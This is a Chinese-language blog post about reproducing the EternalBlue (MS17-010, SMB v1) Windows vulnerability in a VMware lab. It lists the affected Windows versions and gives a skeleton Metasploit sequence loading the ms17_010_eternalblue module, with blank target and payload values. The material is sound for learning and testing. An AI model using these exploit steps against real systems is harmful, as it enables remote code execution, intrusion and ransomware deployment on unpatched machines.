内网渗透日记之永恒之蓝MS17-010

内网渗透日记之永恒之蓝MS17-010

内网渗透日记之永恒之蓝

介绍

永恒之蓝漏洞存在于Windows SMB v1协议的处理过程中,具体是在处理SMB v1请求时发生的漏洞。攻击者可以利用该漏洞在目标系统上执行任意代码。通过扫描开放445端口的Windows机器,攻击者可以在无需用户操作的情况下,植入勒索软件、远程控制木马等恶意程序。

编号:CVE-2017-0146

微软漏洞编号:MS17-010

影响范围

Windows XP、 Windows Server 2003. Windows Vista、Windows Server 2008、 Windows 7. Windows Server2008 R2、Windows 8.1、Windows Server 2012. Windows10、Windows Server 2012 R2、Windows Server 2016

原文链接:https://blog.csdn.net/weixin_55811105/article/details/115804701

复现环境搭建

下载 Windows Server2008 R2,https://www.imsdn.cn/windows-server/windows-server-2008-r2/,然后在vmware安装。

复现

bash
msfconsole
search ms17
use exploit/windows/smb/ms17_010_eternalblue
set payload 
set RHOSTS=
set LPORTS=
run/exploit

image-20250420005610886

image-20250420010247737

参考

https://blog.csdn.net/weixin_55811105/article/details/115804701

https://blog.csdn.net/qq_73252299/article/details/133143917

https://blog.csdn.net/ElsonHY/article/details/109939420

https://blog.csdn.net/m0_62584974/article/details/126322675

https://blog.csdn.net/qq_44159028/article/details/104044002

https://www.cnblogs.com/peeter/articles/18439991

使用三周MacbookAir后的简单总结
安卓逆向——从0学习Frida(配合FridaLab)

评论区

评论加载中...